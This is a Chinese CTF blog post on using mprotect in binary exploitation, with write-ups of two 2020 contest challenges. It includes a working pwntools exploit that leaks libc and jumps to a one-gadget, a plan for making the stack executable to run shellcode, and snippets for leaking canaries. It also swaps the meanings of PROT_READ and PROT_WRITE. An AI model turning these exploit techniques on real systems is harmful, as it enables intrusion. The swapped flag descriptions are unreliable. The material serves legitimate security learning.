PWN技巧-mprotect修改内存保护权限
mprotect 函数用于设置一块内存的保护权限(将从 start 开始、长度为 len 的内存的保护属性修改为 prot 指定的值),函数原型如下所示:
int mprotect(void *addr, size_t len, int prot);
- prot 的取值如下,通过
|可以将几个属性结合使用(值相加):PROT_READ:可写,值为 1PROT_WRITE:可读, 值为 2PROT_EXEC:可执行,值为 4PROT_NONE:不允许访问,值为 0
需要注意的是,指定的内存区间必须包含整个内存页(4K),起始地址 start 必须是一个内存页的起始地址,并且区间长度 len 必须是页大小的整数倍。
如果执行成功,函数返回 0;如果执行失败,函数返回 -1,并且通过 errno 变量表示具体原因。错误的原因主要有以下几个:
EACCES:该内存不能设置为相应权限。这是可能发生的,比如 mmap(2) 映射一个文件为只读的,接着使用 mprotect() 修改为 PROT_WRITE。EINVAL:start 不是一个有效指针,指向的不是某个内存页的开头。ENOMEM:内核内部的结构体无法分配。ENOMEM:进程的地址空间在区间 [start, start+len] 范围内是无效,或者有一个或多个内存页没有映射。
当一个进程的内存访问行为违背了内存的保护属性,内核将发出 SIGSEGV(Segmentation fault,段错误)信号,并且终止该进程。
例题
例题来自 2020 安网杯,pwn1 是相对简单对栈溢出,pwn2 在此基础上增加了 mprotect 的运用,同时还是一个静态编译的程序。
先来看 pwn1,这是一个 64 位的动态链接程序,开启了 Partial RELRO 和 NX。系统层面 ASLR 也是开启的。$ file pwn1
pwn1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=f92248c7cd330ab53768c281b50d14b4612259f4, not stripped
$ pwn checksec pwn1
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
主函数 main() 先调用 write() 打印字符串,然后进入存在栈溢出漏洞的 vul() 函数,read(0, &buf, 0x100uLL) 读入最多 0x100 字节到 0x80 大小的缓冲区。
.text:0000000000400587 ; int __cdecl main(int argc, const char **argv, const char **envp) |
总体思路就是栈溢出控制返回地址,执行 one-gadget。因此,我们还需要泄漏 libc 地址,程序里有 write() 函数可以利用。exp 如下所示:from pwn import *
context(os='linux', arch='amd64', log_level='debug')
io = process('./pwn1')
elf = ELF('./pwn1')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
pop_rsi_r15 = 0x400611
pop_rdi = 0x400613
write = 0x400595
payload = "A"*0x88 + p64(pop_rsi_r15) + p64(elf.got['write'])*2 + p64(write)
io.sendlineafter('welcome~\n', payload)
write_addr = u64(io.recv(8))
io.recv()
one_gadget = write_addr - libc.sym['write'] + 0x4527a
payload = "A"*0x88 + p64(one_gadget)
io.sendline(payload)
io.interactive()
经测试,one-gadget在本题中并不通用,建议自行构造ROP链
pwn2 是一个 64 位的静态链接程序,开启了 Partial RELRO 和 NX。
$ file pwn2 |
由于静态链接程序的执行不再需要 libc,因此 ret2libc 类型的攻击手段就失效了,需要考虑注入 shellcode,但是又开启了 NX 保护,这时就需要使用本节所讲的 mprotect() 函数修改栈的可执行权限。
可以在程序里找到关键函数 _dl_make_stack_executable(),该函数内部调用了 mprotect(v3, dl_pagesize, (unsigned int)_stack_prot):
$ readelf -s pwn2 | grep exec |
unsigned int __fastcall dl_make_stack_executable(_QWORD *a1) |
构造方法是在进入 _dl_make_stack_executable 函数之前,将全局变量 _stack_prot 设置为 7(可读可写可执行),同时将 rdi 设置为全局变量 __libc_stack_end 的值。如下所示:
gef➤ x/gx $rsp-0x10 |
调用 mprotect 前:
0x474754 <_dl_make_stack_executable+36> add BYTE PTR [rbx+0x48], dl |
调用 mprotect 后,可以看到 0x00007ffef00bb000 到 0x00007ffef00bc000 的栈内存已经是 rwx 权限了:
gef➤ vmmap |
接下来程序跳到 vul 函数,读入 shellcode 到栈上并执行,即可获得 shell。exp 如下所示:
from pwn import * |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Zechariahの博客!
微信- 支付宝
相关推荐
2025-02-25
PWN技巧-其他
换库strings libc.so.6 | grep 'ubuntu'#Ubuntu GLIBC 2.35-0ubuntu3.8#Ubuntu GLIBC 2.23-0ubuntu11.3./download 2.23-0ubuntu11.3_amd64patchelf --set-interpreter /home/zechariah/glibc-all-in-one/libs/2.35-0ubuntu3.9_amd64/ld-linux-x86-64.so.2 filenamepatchelf --replace-needed libc.so.6 ./libc.so.6 filename Capstone字节码转汇编代码from capstone import *shellcode_x86 = b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"shellcode_x86 += b"\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"shellcode_x86 ...
2025-02-18
PWN技巧-栈迁移
栈迁移原理介绍与应用 - Max1z - 博客园 介绍我们首先介绍一下Stack pivoting的含义:该技巧就是劫持栈指针指向攻击者所能控制的内存处,然后再在相应的位置进行ROP。一般来说,我们可能在以下情况需要使用stack pivoting: 可以控制的栈溢出的字节数较少,难以构造较长的ROP链 开启了PIE保护,栈地址未知,我们可以将栈劫持到已知的区域。 其它漏洞难以利用,我们需要进行转换,比如说将栈劫持到堆空间,从而在堆上写rop及进行堆漏洞利用此外,利用 stack pivoting有以下几个要求: 可以控制程序执行流 可以控制sp指针。一般来说,控制栈指针会使用ROP,常见的控制栈指针的gadgets一般是pop rsp/esp当然,还会有一些其它的姿势。比如说libc_csu_init中的gadgets,我们通过偏移就可以得到控制rsp指针上面是正常的,下面是偏移的此外,还有更加高级的 fake frame 存在可以控制内容的内存,一般有如下 bss段。由于进程按页分配内存,分配给bss段的内存大小至少一个页(4k,0x1000)大小。然而一般bss段的内容用...
2025-02-26
PWN技巧-绕过Canary的几种姿势
1. 格式化字符串漏洞获取Canarypl1='a'*0x49p.sendafter('overflow?\n',pl1)data=p.recv()canary=b'\x00'+data[0x49:0x49+7]canary = int.from_bytes(canary,'little')success('canary:')success(hex(canary)) 2. 覆盖截断字符获取Canary3. 逐字节爆破Canary 适用于有通过fork()函数创建的子进程的程序 爆破原理 对于Canary,虽然每次进程重启后Canary不同,但是同一个进程中的不同线程的Cannary是相同的,并且通过fork函数创建的子进程中的canary也是相同的,因为fork函数会直接拷贝父进程的内存。 最低位为0x00,之后逐次爆破,如果canary爆破不成功,则程序崩溃;爆破成功则程序进行下面的逻辑。由此可判断爆破是否成功。 我们可以利用这样的特点,彻底逐个字节将Canary爆破出来。通用模...
2025-02-16
PWN技巧-栈对齐
(Ubuntu 18.04版本及以上需考虑 ) 罪魁祸首movaps xmmword ptr [rsp + 0x50], xmm0 从 https://www.felixcloutier.com/x86/movaps 处我们可以知道,这条指令的功能是: 将xmm0中保存的单精度浮点数从xmm0移动至地址[rsp + 0x50]处 。 当然,更重要的是这条指令的执行条件,这直接关系到程序报错的原因。原文中对执行条件的描述如下: When the source or destination operand is a memory operand, the operand must be aligned on a 16-byte (128-bit version), 32-byte (VEX.256 encoded version) or 64-byte (EVEX.512 encoded version) boundary or a general-protection exception (#GP) will be generated. 此时报错的原因就显而易见了:当内存地址作...
2025-02-22
Art_of_shellcode
很有用的网址https://www.exploit-db.com/shellcodes https://v3rdant.cn/Pwn.The-Art-of-Shellcode/ PWN:手动编写 x64 基于syscall 的 shell code(TODO)_x64 syscall pwn-CSDN博客
2025-02-06
ELF文件保护机制
Linux ELF文件的保护主要有四种:Canary、NX、PIE、RELRO 1.CanaryStackCanary表示栈的报警保护。在函数返回值之前添加的一串随机数(不超过机器字长)(也叫做cookie),末位为/x00(提供了覆盖最后一字节输出泄露Canary的可能),如果出现缓冲区溢出攻击,覆盖内容覆盖到Canary处,就会改变原本该处的数值,当程序执行到此处时,会检查Canary值是否跟开始的值一样,如果不一样,程序会崩溃,从而达到保护返回地址的目的。 //GCC用法gcc -o test test.c // 默认情况下,不开启Canary保护gcc -fno-stack-protector -o test test.c //禁用栈保护gcc -fstack-protector -o test test.c //启用堆栈保护,不过只为局部变量中含有 char 数组的函数插入保护代码gcc -fstack-protector-all -o test test.c //启用堆栈保护,为所有函数插入保护代码-fno-stack-protector /-fstack-prote...